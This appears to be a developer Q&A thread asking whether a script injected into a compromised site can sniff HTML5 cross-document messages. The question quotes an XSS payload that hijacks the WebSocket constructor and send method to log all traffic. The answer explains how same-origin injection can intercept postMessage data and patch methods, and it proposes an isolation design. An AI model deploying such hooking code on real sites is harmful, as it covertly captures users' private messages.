# HTML5 Cross-document messaging: can Malicious code sniff messages between domainA.com and domainB.com?

Tags: javascript, security, websocket, cross-domain, xss

According to [10.4 Cross-document messaging](http://www.whatwg.org/specs/web-apps/current-work/multipage/web-messaging.html): domainA.com can send messages to domainB.com using cross-document messaging in the way that prevents cross-site scripting attack when origin and data validated.

[image]

#### Question: consider domainA.com compromised and attacker injected a payload to track messages between domainA.com and domainB.com, is this possible?

For better understanding: its possible to sniff Web Socket traffic by changing original Web Socket object, the working example explained [Here](http://blog.kotowicz.net/2010/11/xss-track-how-to-quietly-track-whole.html), I extracted this part:

```
if (captureWebsocket && window.WebSocket) {

// add logging onmessage listener
function captureRecv(ws) {
  if (typeof ws.captured == 'undefined') {
    ws.addEventListener('message', function(e) {
      var event = {
          event: 'websocket_recv',
          from: location,
          data: e.data,
          url: e.target.URL
      }
      log(event);
    });
    ws.captured = true;
  }
}

// capture sending
var captureSend = this.contentWindow.WebSocket.prototype.send = function() {
  captureRecv(this); // in case socket contruction was before constructor switching
  var event = {
      event: 'websocket_send',
      from: location,
      data: arguments[0],
      url: this.URL
  };

  log(event);
  return window.WebSocket.prototype.send.apply(this, arguments);
}

// capture constructor
this.contentWindow.WebSocket = function(a,b) {
  var base;
  base = (typeof b !== "undefined") ? new WebSocket(a,b) : new WebSocket(a);
  captureRecv(base);
  base.send = captureSend;
  this.__proto__ = WebSocket.constructor;
  return base;
}
}
});
```

Answer (score 2):

If domainA.com is compromised, you're totally pwned. The injected script can just add another window "message" event handler, and because it's on the same origin, it starts receiving everything that domainB postMessage's, and has the ability to postMessage back to domainB.

Not only that but they can use JS to find the iframe, remove any sandbox tags, allow treating it as the same origin, reach in to its contents, then start executing arbitrary JS on that origin as well. It could even patch methods so the injected script receives everything and the legit code does not.

However if they could only inject to domainB, and the iframe is correctly sandboxed, they cannot alter anything domainA does. This is still enough for them to see everything sent and received by postMessage(), though.

The best thing to do is probably have "secureDomain.com" contain both scripts in sandboxed iframes, which then talk to each other. Assuming secureDomain.com can't be injected, then at least injection only affects a single domain and does not allow access to both.

Comment: Thanks for your answer, I knew that adding additional event listener can receive the message, I want a method that can add another function to the original object...